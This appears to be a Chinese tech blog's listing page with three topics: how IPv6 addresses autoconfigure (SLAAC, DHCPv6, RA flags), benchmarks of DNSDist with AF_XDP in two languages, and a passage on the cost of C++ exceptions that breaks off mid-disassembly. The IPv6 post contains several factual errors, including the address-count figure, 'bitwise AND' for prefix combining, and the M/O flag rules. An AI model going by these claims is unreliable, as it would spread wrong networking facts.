2023-01-09发表2023-03-19更新19 分钟读完 (大约2874个字)

网络拾遗--IPv6 地址自动配置

前言

近年来，就 Y7n05h 的主观体验来说，虽然 IPv4 地址资源耗尽早已不是什么新鲜的话题，但 IPv6 的发展一直处于不温不火的境地。
也许海外地区对 IPv6 的应用更为广泛，这一点 Y7n05h 就不得而知了，因此也不做过多的讨论。

在 Y7n05h 通过发布匿名调查问卷中，截止 2023-01-07T19:57+00:00 得到了 97 位受访者的对 IPv6 的普及情况的一些统计信息：

仅有 46% 的受访者表示自己的所有家庭网络设备支持 IPv6
仅有 58% 的受访者表示自己的运营商提供了 IPv6 的接入
仅有 13% 的受访者表示自己喜欢或常用的服务全部支持 IPv6 访问
仍有 29% 的受访者表示自己仅使用 IPv4，不使用 IPv6
没有任何受访者表示自己仅使用 IPv6 不使用 IPv4

注：

上述统计信息仍在进行，且受访者可随时更改自己已提交的答案，因此以上信息仅针对 2023-01-07T19:57+00:00 时的统计结果。
Y7n05h 无法对受访者提交的信息的真实性、准确性做出核实，上述内容仅供参考。

根据以上统计信息，纵使多年过去，IPv6 的普及情况依旧不容乐观。

IPv6 与 IPv4 最大的不同（当然也是最众所周知的不同）那当然是在地址长度上。IPv6 通过 16 bytes 的地址长度与 IPv4 的 4 bytes 地址长度相比仅仅增长原来的 3 倍，但能提供的地址数量却增长了 95 倍，号称能为世界上的每一粒沙子分配一个 IPv6 地址。
通过扩充地址长度，IPv6 确实从根本上解决了 IPv4 地址耗尽的问题。
不但如此，IPv6 还通过取消了 IPv4 中的校验和、取消 IPv4 中的 Options、取消了 IPv4 中的分片简化了软硬件实现的复杂度。
对 IPv4 而言 ARP、DHCP、ICMP 也是在通信过程中重要的一环，遗憾的是，IPv6 对这里做出了很多改变。
存在 DHCPv6、ICMPv6 这两种协议，但却并不存在 ARPv6 这种看似应该存在的东西。另外，除了 DHCPv6 之外，IPv6 还有其他用来配置 IP 的方式。
诸如此类的细节改动还有取消广播，优化任播、组播等等。这些改动修正了 IPv4 中的很多问题，也让网络层协议更加精简。

IPv6 与 IPv4 的更多差异可查阅与IPv4 比较。

IPv6 带来了足够多的优化，但究竟是什么让 IPv6 的普及困难重重？

Y7n05h 曾一度认为是 40 bytes IPv6 header，让习惯了迷你的只有 20 bytees IPv4 header 的用户无法适应，认为其中存在性能问题。
但，这一观点其实也很难成立。在 vxlan 这种巨大的 overhead 面前，IPv6 相比 IPv4 多出来的 20 bytes 实在算是迷你。
而 vxlan 早都在生产环境中大量使用了。万兆、2.5 G 网络甚至都在家庭用户中普及（更别提数据中心的网络又进一步升级到了何等程度）。所以对 IPv6 带来的额外的 20 bytes 开销过于担心可能是多余的。

那么 IPv6 的普及困难或许和开发者不愿处理双栈带来的程序复杂度上升有关，毕竟与 IPv6 这位新友相比 IPv4 绝对称得上故旧了，开发者们基于降低程序复杂度的考虑不去支持 IPv6 也不算奇怪。
另一方面，可能与运营商对 IPv6 网络支持仍旧不如 IPv4 有关。

IPv6 地址分类

单播地址

下面是部分常见的 IPv6 单播地址分类，更多详细类别可查看IPv6 单播特殊地址：

分类	范围	说明
全球单播地址 Global Unicast Address	2000::/3	作用类似「IPv4 公网地址」
链路本地地址 Link Local Address	fe80::/10	仅在链路内有效
站点本地地址 Site Local Address	fec0::/10	已被 RFC3879 废弃
唯一本地地址 Unique Local Address	fc00::/7	作用类似「IPv4 私网地址」
未指定地址 Unspecified Address	::/128	作用类似 `0.0.0.0/32`
回环地址 Loopback Address	::1/128	作用类似 `127.0.0.0/8`

有效范围：全球单播 > 唯一本地 > 链路本地

组播地址

IPv6 多播地址都位于：ff00::/8。

组播也在 IPv6 通信过程中发挥重要作用，但本文无意过多涉及组播相关内容。
在此，笔者仅列出几个出现在本文后续内容中的组播地址，更多内容可以查看 IPv6 多播地址：

ff02::1 All nodes on the local network segment
ff02::2 All routers on the local network segment
ff02::1:ff00:0/104 Solicited-node multicast address

被请求节点组播地址（Solicited-node multicast address）将在 DaD（Duplicate address detection）中使用。要得到一个 IPv6 单播地址对应的被请求节点组播地址（Solicited-node multicast address）只需要让 ff02::1:ff00:0 与 IPv6 地址的高 24 bits 按位与即可。

IPv6 地址自动配置的过程

TIP
本节内容是对 IPv6 地址自动配置流程的总体叙述。本节中提及的 Stateless、Stateful 将在后文说明。

下面是 IPv6 地址自动配置中的流程，其中缺少了 DaD（Duplicate address detection）相关的流程。

$IPv6 地址自动配置流程\[1\]$

下图是在 IPv6 网络地址自动配置过程中通过 Wireshark 进行抓包分析得到的数据：

IPv6 地址自动配置抓包
No.19 Router Advertisement 报文
可以看到编号 6-22 的包是在进行地址的自动配置，其中：

No.6 是在对通过 Stateless 方式配置得到的 Link Local Adress 进行 DaD
No.18 和 No.19 为请求并获得 RA 报文
No.21 和 No.22 则是对通过 Stateless 方式配置的两个 Global Unicast Address 进行 DaD

地址自动配置方法分类

本地链路地址配置 Link Local Address

Link Local Address 能通过两种方式完成配置：

手动配置
Stateless 地址自动配置

全球单播地址 Global Unicast Address / 唯一本地地址 Unique Local Address 自动配置

全球单播地址 Global Unicast Address 和唯一本地地址 Unique Local Address 的配置并无区别。

手动配置
Stateless 地址自动配置
Stateful 地址自动配置
地址自动配置方法分类解释

这个标题听起来复杂，但简而言之：
新上线的设备通过一定的策略挑一个 IP 出来使用，准备使用之前，新上线的设备先对欲使用的 IP 执行 DAD，看看这个 IP 是否已经被别的设备使用，如果没被别的设备端占用那就用它。
这个策略总体上分三类，也就是：

手动配置
Stateless 地址自动配置
Stateful 地址自动配置

手动配置自然不必多提，下面我们讨论两种自动配置的方法。

Stateless 地址自动配置（Stateless Address Auto-configuration,SLAAC）

Stateless 意味着没有控制中心，没有一个 controller 来负责管理 IP 地址的分配。IP 地址由设备自己选择。
常见的 Stateless 地址自动配置方式由：

Modified EUI-64
Random

EUI-64 将网卡的 MAC 地址加以修改并和从 RA 报文中获得的 Prefix information 按位与就能得到 IP 地址。
Random 则随即挑选一个值，并把它和从 RA 报文中获得的 Prefix information 按位与就能得到 IP 地址。

Stateful 地址自动配置（Stateful Address Auto-configuration）

Stateless 意味着有控制中心，有一个 controller 来负责管理 IP 地址的分配。IP 地址由设备自己选择。
相信此时一定想起来了 IPv4 的 DHCP 完美符合这个需求。对的，对 IPv6 而言，Stateful 就意味着 DHCPv6。

常见的 Stateful 方式有两种：

Stateful DHCPv6
Stateless DHCPv6

这二者又有什么区别？
Stateful DHCPv6 意味着使用从 DHCPv6 获得的所有信息。
Stateless DHCPv6 则意味着使用 Stateless 的方式生成 IPv6 的地址，但从 DHCPv6 中获取网络的其他信息（例如 DNS）。

路由器通告（Router Advertisement,RA）

链路中的 Router 会定期向 ff02::1 组播 RA 报文。新加入链路的设备为了立即获得 RA 报文，通常回向 ff02::2 组播 RS（Router Solicitation）报文，使得 Router 回复 RA 报文。
这是前文在抓包过程中得到的 RA 报文。
No.19 Router Advertisement 报文

RA 报文里面包含了 Prefix information 用来在 SLAAC 时生成 IP 地址（前文已说明）。
Prefix information 含有一下 flags：

Flag: 0xc0, On-link flag(L), Autonomous address-configuration flag(A)
1… …. = On-link flag(L): Set
.1.. …. = Autonomous address-configuration flag(A): Set
..0. …. = Router address flag(R): Not set
…0 0000 = Reserved: 0

其中的 A flag 对 IPv6 地址自动配置有较大影响：

A：若 A flag 被设置则需要为当前 Prefix 通过 SLAAC 配置 IP 地址。（无论 A flag 是否设置，都需要为当前 Prefix 设置路由表）

对于 Router Advertisement 中的 flags 则需要关注：

Flags: 0x08, Prf (Default Router Preference): High
0… …. = Managed address configuration: Not set
.0.. …. = Other configuration: Not set
..0. …. = Home Agent: Not set
…0 1… = Prf (Default Router Preference): High (1)
…. .0.. = Proxy: Not set
…. ..0. = Reserved: 0

M：Managed address configuration
O：Other configuration

若 M == true 都被设置则使用 Stateful DHCPv6 完成地址配置。
若 ( M == false && O == true ) 则使用 Stateless DHCPv6 完成地址配置。
若 ( M == false && O == false ) 则使用 Stateful 完成地址配置。

对 RA 报文更详细的说明可查阅：ICMPv6 RA 和 RS 报文。（注：这里的文档有些陈旧，缺少了 RA 报文对 DNS 的支持的信息。）

邻居通告（Neighbor Advertisement,NA）

邻居请求报文（Neighbor Solicitation,NS）和邻居通告报文（Neighbor Advertisement,NA）的作用类似 IPv4 中的 ARP Request 和 ARP Reply。
与 ARP Request 使用广播不同，NS 通过向请求 IP 的被请求节点组播地址（Solicited-node multicast address）进行组播。网卡能对组播报文进行过滤，仅接受需要的组播报文，比广播机制更加高效。
NA 报文常常被用作重复地址检测（Duplicate address detection），当一个设备正试图使用一个 IP 地址时，将会向其对应的被请求节点组播地址组播 NS 报文，请求解析该 IP 地址的 MAC 地址。在一定时间内，若未能收到回复，则说明链路上不存在使用这个 IP 的设备；反之则说明该 IP 已被使用。通过任意一种方式配置的 IPv6 地址，设备都会对其进行重复地址检测。

参考资料

2022-08-16发表11 分钟读完 (大约1648个字)

Speed up DNSDist with AF_XDP

Chinese readers can read the Chinese version of this article.
中文读者可阅读本文的中文版本。

Preface

DNSDist is an excellent DNS load balancer, and AF_XDP is an emerging high-performance Linux asynchronous IO interface that benefits from eBPF.
It is a great honor for Y7n05h to participate in the AF_XDP transformation of DNSDist as a contributor.

It’s an honor to have Y7n05h as a contributor to improve DNSDist with AF_XDP.

The changes to the UDP part of DNSDist have long since come to an end. This performance-improving modification requires profiling data to validate.

So, let’s start the fun performance analysis.

Test environment information

Laptop
OS: ArchLinux
Kernel Version: 5.19.1-arch2-1
CPU: AMD Ryzen 7 4800H with Radeon Graphics
MEM: DDR4 64G
NIC: Intel Corporation Wi-Fi 6 AX200 (rev 1a)
DNSPerf Version: 2.9.0
GCC Version: 12.1.1
Libxdp Version:1.2.5

PC1
OS: ArchLinux
Kernel Version: 5.19.1-arch2-1
CPU: Intel(R) Core(TM) i5-8500 CPU @ 3.00GHz
MEM: DDR4 8G
NIC: Intel Corporation Wi-Fi 6 AX200 (rev 1a)

PC2
OS: Ubuntu
Kernel Version: 5.15.0-46-generic
CPU: 12th Gen Intel(R) Core(TM) i7-12700KF
MEM: DDR4 64G
NIC: Broadcom Inc. and subsidiaries BCM4360 802.11ac Wireless Network Adapter (rev 03)

Thanks to @yegetables for lending PC2 to Y7n05h.

Source Code：
DNSDist With AF_XDP(AF_XDP verion): https://github.com/Y7n05h/pdns/commit/d42e356a48a433a9f4efae9c3dd648101a37abdf
DNSDist Without AF_XDP(Normal version): https://github.com/Y7n05h/pdns/commit/f5e76c2a6932ec4360d38219fb515d26d538b40d

In this test, Y7n05h uses Laptop to generate the requests for testing, PC1 to run the DNSDist instance to be tested, and PC2 to run the SmartDNS service.
Laptop, PC1 and PC2 are all connected to the gateway (192.168.30.1) using WIFI, and Laptop, PC1 and PC2 access each other via WIFI. Unfortunately, the network used in this test environment was still used by numerous other devices during the test, so Y7n05h cannot exclude experimental errors caused by fluctuations in the network environment.

The test tool uses DNSPerf. The test resolves A records for 12018 different domains, only once for each domain in each test.

For the tests, SmartDNS was used as the DNS server. There is no particular reason to use SmartDNS, except that Y7n05h is familiar with it and it is easy to build and deploy SmartDNS on Ubuntu.

During the test, Y7n05h used Laptop to send DNS query requests to PC1 running DNSDist. SmartDNS then concurrently sends the DNS requests to the 4 DNS servers 1.1.1.1, 1.0.0.1, 8.8.8.8, 119.29.29.29 (if necessary) and replies to DNSDist with the first response received.

In this test, Y7n05h sent a lot of DNS query requests to the above 4 public DNS servers frequently due to testing needs, Y7n05h expresses sincere thanks to Cloudflare, Google, DNSPod for providing these public DNS services. (Although Y7n05h performed a large number of DNS queries during the test, these queries are cached by DNSDist, SmartDNS, and not every query sends a request to the above servers. (Therefore Y7n05h feels this is acceptable, which is fundamentally different from DDoS.) Also, in order to eliminate as much interference as possible from the DNS service’s cache for this test, Y7n05h has used DNSPerf to repeatedly send resolution requests to SmartDNS for all domains used in the test before the start of this test.

In the current network environment, Y7n05h’s subjective guess is that DNS query requests are still dominated by A records and AAAA records. Since Y7n05h’s environment does not have good IPv6 support, the resolution of A records was used as a performance indicator in this test. Since Y7n05h cannot verify the correctness of the DNS resolution results, we do not consider correctness as a metric in this performance analysis.

It should also be noted that the DNSDist configuration used in this test has been simplified for testing purposes and may differ significantly from the DNSDist configuration in the production environment. Therefore, this test by Y7n05h does not fully reflect the performance of AF_XDP’s optimization of DNSDist in a production environment.

As we all know, the DNS protocol uses recursive resolution, and the response time of requests is greatly affected by whether the query domain hits the DNS server’s cache or not.

In summary, this test by Y7n05h may be biased and may be inaccurate. The following is only the opinion of Y7n05h.

Performance Tests

The uniq.txt contains and only contains 12018 non-repeating domains.

In this article, the horizontal axis of all lines is the number of runs, and the number of DNSPerf runs is incremented by 1 for each DNSPerf run, the result of multiple DNSPerf executions for the same DNSDist process instance on the same curve. The points on the same curve are listed in chronological order from left to right. Any two DNSPerf’s do not overlap.

To simplify the exposition of this paper, Y7n05h hereby agrees with the reader that

The version of DNSDist that uses AF_XDP is omitted as “AF_XDP version”.
DNSDist version without AF_XDP is omitted as “Normal version”.

Test 1

The following command was used in this test to run DNSPerf:

1	dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt

In test 1, Y7n05h ran the AF_XDP version first, then the Normal version, and finally the AF_XDP version again.

Looking at the average latency first, there is a decreasing trend in the average latency regardless of the fold. The decreasing average latency is generally due to the fact that after multiple DNSPerf executions, SmartDNS and the downstream servers have increased their hit rate for the domain name caches involved in the DNSPerf in this test. This is evidenced by the fact that the average latency of “re-running AF_XDP version” after “running Normal version” is significantly lower than the previous test results. Based on the data available at this time, it is not possible to determine the impact of AF_XDP on average latency.

For the metric of query loss, the AF_XDP version is significantly lower than the Normal version. The number of lost queries with the AF_XDP version tends to increase slowly with the number of tests.

For the average number of queries per second, or throughput, using the AF_XDP version is significantly better than the Normal version. Considering that the fetch time of the data in the blue curve is between the green and red curves, the effect of caching on the AF_XDP version is that it enhances the green curve and degrades the red curve. This is a strong enough comparison for the non-AF_XDP version of DNSDist with the blue curve to show the throughput advantage of AF_XDP.

The runtime is the time consumed for a complete execution of DNSPerf. The conclusion here is also that the AF_XDP version outperforms the Normal version. The conclusions here are similar to those from the throughput analysis, and Y7n05h does not repeat them.

Even considering the caching impact on DNS in queries such as DNSDist, SmartDNS, etc. results in DNSPerf speeding up in the time dimension one by one. What can be clearly concluded at this point is that AF_XDP significantly improves DNSDist’s throughput in the current scenario. The impact on query latency may still require further testing.

Test 2

The following command was used in this test to run DNSPerf:

1	dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt -c 500 -T 16

In Test 2, the concurrency of the test was increased by adding command line arguments. Test 2 ran the Normal version first and the AF_XDP version second.

Note: Test 2 was not run consecutively with Test 1, which may have affected the DNS cache.

The average latency of the AF_XDP version is still decreasing and is not significantly different from the Normal version in the last two tests. y7n05h I personally guess that if we increase the number of tests, the average latency of the AF_XDP version may be lower than the Normal version as the cache command increases. The average significant latency of the AF_XDP version was higher than the Normal version in the first 3 tests, perhaps because the cache in DNSDist was cleared by stopping the Normal version and running the AF_XDP version. the effect of AF_XDP on the average latency still needs further testing.

Comparing the query misses for the Normal and AF_XDP versions, they remain similar to those in Test 1. There is also no significant change in the number of queries lost compared to Test 1.

In terms of throughput, the gap between the AF_XDP version and the Normal version increases further for more concurrent query requests, and tends to increase with the number of tests.

The AF_XDP version is significantly less time consuming than the Normal version for one DNSPerf execution. This is similar to what was found in Test 1.

Summary

AF_XDP significantly improves DNSDist throughput, but risks increasing the average latency per request (which needs to be further verified).

In terms of throughput alone, it is conservatively estimated that AF_XDP can more than double the throughput of DNSDist.

From the tests here, it appears that AF_XDP is a technique that has the potential to significantly improve the throughput of UDP-based web services.

2022-08-16发表17 分钟读完 (大约2551个字)

用 AF_XDP 加速 DNSDist

英文读者可阅读本文的英文版本。
English readers can read the English version of this article.

前言

DNSDist 是一个优秀的 DNS 负载均衡器，AF_XDP 则是得益于 eBPF 而产生的新兴的高性能 Linux 异步 IO 接口。
很荣幸 Y7n05h 能作为一个贡献者，参与 DNSDist 的 AF_XDP 改造。

目前，对 DNSDist 的 UDP 部分的改造早已告一段落。这种意在提高性能的修改成果当然不该只是纸上谈兵。
收集压测数据，进行性能分析才是最有说服力的成绩单。

那么，便开始有趣的压测吧。

压测环境

PC1
OS: ArchLinux
Kernel Version: 5.19.1-arch2-1
CPU: Intel(R) Core(TM) i5-8500 CPU @ 3.00GHz
MEM: DDR4 8G
NIC: Intel Corporation Wi-Fi 6 AX200 (rev 1a)
压测过程中 PC1 除必要的系统进程外，仅运行了 DNSDist。

PC2
OS: Ubuntu
Kernel Version: 5.15.0-46-generic
CPU: 12th Gen Intel(R) Core(TM) i7-12700KF
MEM: DDR4 64G
NIC: Broadcom Inc. and subsidiaries BCM4360 802.11ac Wireless Network Adapter (rev 03)
压测过程中 PC2 的 CPU、MEM、NIC 始终保持着低负载。

感谢 @yegetables 提供的 PC2 ，让 Y7n05h 有了稳定运行的 SmartDNS 服务。这对本次压测有很大的帮助。

源码信息：
DNSDist With AF_XDP: https://github.com/Y7n05h/pdns/commit/d42e356a48a433a9f4efae9c3dd648101a37abdf
DNSDist Without AF_XDP: https://github.com/Y7n05h/pdns/commit/f5e76c2a6932ec4360d38219fb515d26d538b40d

本次测试中，Y7n05h 使用 Laptop 下发压测流量，使用 PC1 运行待测试的 DNSDist 实例，使用 PC2 运行 SmartDNS 服务。
Laptop、PC1、PC2 均使用 WIFI 连接至网关（192.168.30.1）。Laptop、PC1、PC2 通过 WIFI 相互访问。遗憾的是这次测试环境中使用的网络在测试过程中仍然被众多其他设备使用，因此 Y7n05h 也无法排除由网络环境波动导致的实验误差。

测试工具使用 DNSPerf。测试中解析 12018 个不同域名的 A 记录，每次测试中每个域名仅解析一次。

测试中，使用 SmartDNS 作为 DNS 服务器。使用 SmartDNS 并没有什么特别的原因，只是因为 Y7n05h 很熟悉它并且在 Ubuntu 上构建并部署 SmartDNS 很方便。

测试过程中，Y7n05h 使用 Laptop 向运行 DNSDist 的 PC1 发送压测请求，PC1 上运行的 DNSDist 解析并处理 DNS 请求后，发送给运行 SmartDNS 的 PC2（如果有必要的话），SmartDNS 则在收到 DNS 请求后并发的发送给 1.1.1.1、1.0.0.1、8.8.8.8、119.29.29.29 这 4 个 DNS 服务器（如果有必要的话），并将最先接收到的响应回复给 DNSDist。

在本次测试中，因测试需要，Y7n05h 频繁的向上述 4 个公共 DNS 服务器发送了大量的 DNS 请求，Y7n05h 对 Cloudflare、Google、DNSPod 提供的这些公共 DNS 服务表示真心的感谢。（Y7n05h 虽然在测试中进行了大量的 DNS 查询，但这些查询会被 DNSDist、SmartDNS 缓存，并不是每次查询都会向上述服务器发送请求。因此 Y7n05h 自认为本次测试中的做法并未超出合理限度。）同时，为了尽最大可能的排除 DNS 服务的缓存为本次测试造成的干扰，在本次测试开始前，Y7n05h 已使用 DNSPerf 反复多次向 SmartDNS 发送在测试中使用的所有域名的解析请求。

目前的网络环境中，Y7n05h 主观猜测 DNS 请求仍旧以 A 记录和 AAAA 记录为主，且 Y7n05h 所在的环境中 IPv6 支持并不好。因此 Y7n05h 在这次测试中就以 A 记录的解析能力作为衡量性能的指标。另一方面，Y7n05h 也无法验证 DNS 的解析结果的正确性，因此 Y7n05h 在这次性能分析中不考虑正确性这一指标。

还需要指明的是，这次测试中使用的 DNSDist 配置为了测试方便做出了众多简化，和生产环境中对 DNSDist 的配置可能有较大差异。因此 Y7n05h 的这次测试并不能完全反应 AF_XDP 对 DNSDist 的优化在生产环境中的表现。

众所周知，DNS 协议使用递归的解析方式，请求的响应时间极大的受查询域名是否命中 DNS 服务器的缓存影响。

综上所述，Y7n05h 的这次测试可能是有失偏颇的，可能是不精确的。以下内容仅代表 Y7n05h 观点。

压力测试

uniq.txt 中包含且仅包含 12018 个不重复的域名。

在本文中，所有折线的横轴均为运行的次数，每运行一次 DNSPerf 次数递增 1，同一条曲线对同一 DNSDist 进程实例多次执行 DNSPerf 的结果。同一条曲线上的点，按照时间顺序由左向右排列。任意两次 DNSPerf 均不重叠。

为简化本文论述，Y7n05h 在此与读者约定：

使用 AF_XDP 的 DNSDist 版本省略为「AF_XDP 版」
不使用 AF_XDP 的 DNSDist 版本省略为「Normal 版」

测试1

本次测试中使用如下命令运行 DNSPerf:

1	dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt

在测试 1 中，Y7n05h 先运行了 AF_XDP 版本，然后运行 Normal 版本，最后再次运行 AF_XDP 版。

先看平均延迟，总体来看，无论哪条折线，平均延迟均呈递减趋势。平均延迟呈递减趋势的原因大致为多次执行 DNSPerf 后，SmartDNS 和上游服务器对本次测试中 DNSPerf 涉及的域名缓存命中率逐次提高所致。这一点在「运行完 Normal 版」后，「重新运行 AF_XDP 版」的平均延迟显著低于先前的测试成绩得到印证。根据目前现有的数据，无法判断 AF_XDP 本身对平均延迟的影响

对查询丢失这一指标而言，AF_XDP 版本显著低于正常版。使用 AF_XDP 版本的查询丢失数量随测试次数增加有缓慢递增趋势。

对平均每秒查询数量，或者说吞吐量来说，使用 AF_XDP 版本显著优于 Normal 版本。考虑蓝色折线中的数据的获取时间介于绿色折线和红色折线，缓存对 AF_XDP 版本的影响是增强了绿色曲线而劣化了红色曲线，故此，若以蓝色曲线执行时的缓存情况作为基准，使用 AF_XDP 的 DNSDist 的真实吞吐量大致引介于红色曲线和绿色曲线之间，这对蓝色曲线的不使用 AF_XDP 版本的 DNSDist 而言，有足够强的对比，足够体现 AF_XDP 的吞吐量优势。

运行时间为完整执行一次 DNSPerf 所消耗的时间。这里的结论也是 AF_XDP 版本优于 Normal 版本。这里的结论和从吞吐量分析得来的结论类似，Y7n05h 不再赘述。

即使考虑到 DNSDist、SmartDNS 等查询中对 DNS 的缓存影响导致 DNSPerf 在时间维度上逐次加速。目前能明确得出结论的是，AF_XDP 能显著提升 DNSDist 在当前场景下的吞吐量。对查询延迟的影响，可能仍然需要进一步测试。

测试2

1	dnsperf -s 192.168.30.170 -p 5300 -d uniq.txt -c 500 -T 16

在测试 2 中，通过添加命令行参数，提高了测试的并发量。测试2 中先运行了 Normal 版本，后运行了 AF_XDP 的版本。

注意：测试2 与测试1 并不连续进行，这可能影响了 DNS 的缓存。

还是先看平均延迟，可以看到后运行的 AF_XDP 版本的延迟仍然呈现递减趋势，在最后的两次测试中与 Normal 版本并无显著差异。Y7n05h 个人猜测若增加测试次数，随着缓存命令中的提高，AF_XDP 版本的平均延迟或将低于 Normal 版。前 3 次测试中，AF_XDP 版的平均显著延迟高于 Normal 版，或许是停止 Normal 版并运行 AF_XDP 版，导致 DNSDist 中的缓存被清除所致。AF_XDP 对平均延迟的影响，仍需进一步测试。

对比 Normal 版和 AF_XDP 版的查询丢失情况，两者仍保持了与测试1 中相似的情况。且查询丢失数量与测试1 相比也无明显变化。

就吞吐量而言，加大并发量的查询请求中，AF_XDP 版与 Normal 版的差距进一步增大，且有随测试次数增加继续增大差距的趋势。

对执行一次 DNSPerf 的耗时而言，AF_XDP 版明显低于 Normal 版。这与测试1 中得到的结论相似。

总结

AF_XDP 能显著提高 DNSDist 的吞吐量，但有提高平均每次请求的延迟的风险（这还需要进一步验证）。

仅就吞吐量而言，保守估计 AF_XDP 能提升 DNSDist 的吞吐量一倍以上。

从这里的测试来看， AF_XDP 这项技术有可能明显提升基于 UDP 的网络服务的吞吐量。

2022-05-02发表18 分钟读完 (大约2718个字)

浅谈 C++ 异常的性能

起因

这件事的开端有些离奇，Y7n05h 在完成 Leetcode 题目 LRU Cache 时写出了这样的代码：

class LRUCache {
    struct DoubleLinkListNode {
        DoubleLinkListNode *prev;
        DoubleLinkListNode *next;
        int key;
        int value;
    };
    class DoubleLinkList {
        DoubleLinkListNode head;
        DoubleLinkListNode tail;

    public:
        int size{};
        DoubleLinkList() {
            head.prev = nullptr;
            head.next = &tail;
            tail.next = nullptr;
            tail.prev = &head;
        }
        void moveToHead(DoubleLinkListNode *node) {
            node->prev->next = node->next;
            node->next->prev = node->prev;

            node->next = head.next;
            node->prev = &head;

            head.next->prev = node;
            head.next = node;
        }
        DoubleLinkListNode *back() const {
            return tail.prev;
        }
        DoubleLinkListNode *newNode(int key, int value) {
            auto *node = new DoubleLinkListNode;

            node->next = head.next;
            node->prev = &head;

            head.next->prev = node;
            head.next = node;

            node->key = key;
            node->value = value;
            ++size;
            return node;
        }
    };


public:
    LRUCache(int capacity) : cap(capacity) {
    }


    int get(int key) {
        try {
            auto *node = map.at(key);
            list.moveToHead(node);
            return node->value;
        } catch (std::out_of_range &) {
            return -1;
        }
        return -1;
    }

    void put(int key, int value) {
        try {
            auto *node = map.at(key);
            node->key = key;
            node->value = value;
            list.moveToHead(node);
        } catch (std::out_of_range &) {
            if (list.size == cap) {
                auto *node = list.back();
                map.erase(node->key);
                map[key] = node;
                node->key = key;
                node->value = value;
                list.moveToHead(node);
            } else {
                auto *node = list.newNode(key, value);
                map[key] = node;
            }
        }
    }


    int cap = 0;
    DoubleLinkList list;
    unordered_map<int, DoubleLinkListNode *> map;
};

这样的代码虽然被 Accept 了，但性能并不好，在运行时间上只击败了 5% 的 C++ 提交。对此成绩，Y7n05h 属实不能接受。

代码中对以元素的查找都是 $O(1)$ 的，链表的访问也都是从头尾访问或是直接通过指针访问链表节点，甚至链表节点也会被复用，减少内存分配器的开销。
排除众多无可优化之处，Y7n05h 凭借直觉认为是异常拖慢了程序的运行。

这也好办，只需修改 LRUCache::get 和 LRUCache::put 即可。可以看到，代码中对异常的应用实际上只有用来检测 key 是否在 map 中。那么改用 std::unordered_map::count 来判断就好。

int get(int key) {
    if (map.count(key) == 0)
        return -1;
    auto *node = map.at(key);
    list.moveToHead(node);
    return node->value;
}

void put(int key, int value) {
    if (map.count(key)) {
        auto *node = map.at(key);
        node->key = key;
        node->value = value;
        list.moveToHead(node);
        return;
    }
    if (list.size == cap) {
        auto *node = list.back();
        map.erase(node->key);
        map[key] = node;
        node->key = key;
        node->value = value;
        list.moveToHead(node);
    } else {
        auto *node = list.newNode(key, value);
        map[key] = node;
    }
}

修改后，代码的运行时间击败了 90% 左右的提交。

那么问题来了，为什么一个异常对性能的影响这么大？

性能分析

为了本地环境测试两版程序的性能，Y7n05h 编写了如下测试代码：

int main() {
    LRUCache cache(2);
    for (int i = 0; i < 1000000; i++) {
        cache.put(1, 0);
        cache.put(2, 2);             
        printf("%d\n", cache.get(1));
        cache.put(3, 3);             
        printf("%d\n", cache.get(2));
        cache.put(4, 4);             
        printf("%d\n", cache.get(1));
        printf("%d\n", cache.get(3));
        printf("%d\n", cache.get(4));
    }
}

两版程序均使用相同的编译参数进行编译：

1	clang++ -stdlib=libc++ -O2 -flto -g lru1.cpp

为了尽可能展现现代 C++ 程序所能获得的编译器优化后的性能差异，Y7n05h 开启了 O2 和 lto。

测试环境：

clang version: 13.0.1
libc++: 13.0.1
Linux Kernel version: 5.17.5
glibc version: 2.35
gcc-libs: 11.2.0
perf: 5.17

这是使用异常机制的程序性能火焰图：

这是不使用异常机制的程序性能火焰图：

如果这还不够明显，那还可依看看 perf diff 的输出：

21.05%    -19.30%  libc.so.6             [.] __vfprintf_internal
          +18.98%  libgcc_s.so.1         [.] execute_cfa_program
          +13.11%  libgcc_s.so.1         [.] uw_frame_state_for
12.12%    -11.31%  libc.so.6             [.] _IO_file_xsputn
11.84%    -10.64%  libc.so.6             [.] __write
          +10.49%  libgcc_s.so.1         [.] uw_update_context_1
           +9.05%  libgcc_s.so.1         [.] _Unwind_IteratePhdrCallback
           +4.76%  libc++abi.so.1.0      [.] __gxx_personality_v0
 4.86%     -4.48%  libc.so.6             [.] _IO_file_write
 4.20%     -3.84%  libc.so.6             [.] new_do_write
           +3.60%  libc++abi.so.1.0      [.] __cxa_call_unexpected
           +3.47%  libgcc_s.so.1         [.] uw_install_context_1
           +3.44%  libgcc_s.so.1         [.] read_encoded_value_with_base
           +3.28%  libc.so.6             [.] __strlen_avx2

可以看到 execute_cfa_program、uw_frame_state_for、uw_update_context_1 在改动前后变化很大。一个重要线索是这些和栈展开有关的函数都在 libgcc_s.so.1 中。

从此处可知， clang 编译的程序也是使用 libgcc 实现的栈展开机制。

异常的实现

在此前 Y7n05h 只知道异常的原理是栈展开，但对细节一概不知道。借这次的机会来稍微看看异常处理的原理吧。

/* SimpleException.cpp */
#include <cstdio>
#include <cstdlib>
#include <exception>
void bar(unsigned int n) {
  if (n & 1) {
    throw std::exception();
  }
}

void foo(int n) {
  try {
    bar(n);
  } catch (...) {
    printf("exception\n");
  }
  printf("End\n");
}
int main(int argc, char *argv[]) { foo(atoi(argv[1])); }

看看 bar 函数的反汇编（使用 Intel 风格）：

0x0000000000401995 <+0>:     push   rbp
0x0000000000401996 <+1>:     mov    rbp,rsp
0x0000000000401999 <+4>:     push   rbx
0x000000000040199a <+5>:     sub    rsp,0x18
0x000000000040199e <+9>:     mov    DWORD PTR [rbp-0x14],edi
0x00000000004019a1 <+12>:    mov    eax,DWORD PTR [rbp-0x14]
0x00000000004019a4 <+15>:    and    eax,0x1
0x00000000004019a7 <+18>:    test   eax,eax
0x00000000004019a9 <+20>:    je     0x4019dc <bar(unsigned int)+71>
0x00000000004019ab <+22>:    mov    edi,0x8
0x00000000004019b0 <+27>:    call   0x401dc0 <__cxa_allocate_exception>
0x00000000004019b5 <+32>:    mov    rbx,rax
0x00000000004019b8 <+35>:    mov    rdi,rbx
0x00000000004019bb <+38>:    call   0x401a96 <std::exception::exception()>
0x00000000004019c0 <+43>:    mov    rax,0x402080
0x00000000004019c7 <+50>:    mov    rdx,rax
0x00000000004019ca <+53>:    lea    rax,[rip+0xc7dc7]        # 0x4c9798 <typeinfo for std::exception>
0x00000000004019d1 <+60>:    mov    rsi,rax
0x00000000004019d4 <+63>:    mov    rdi,rbx
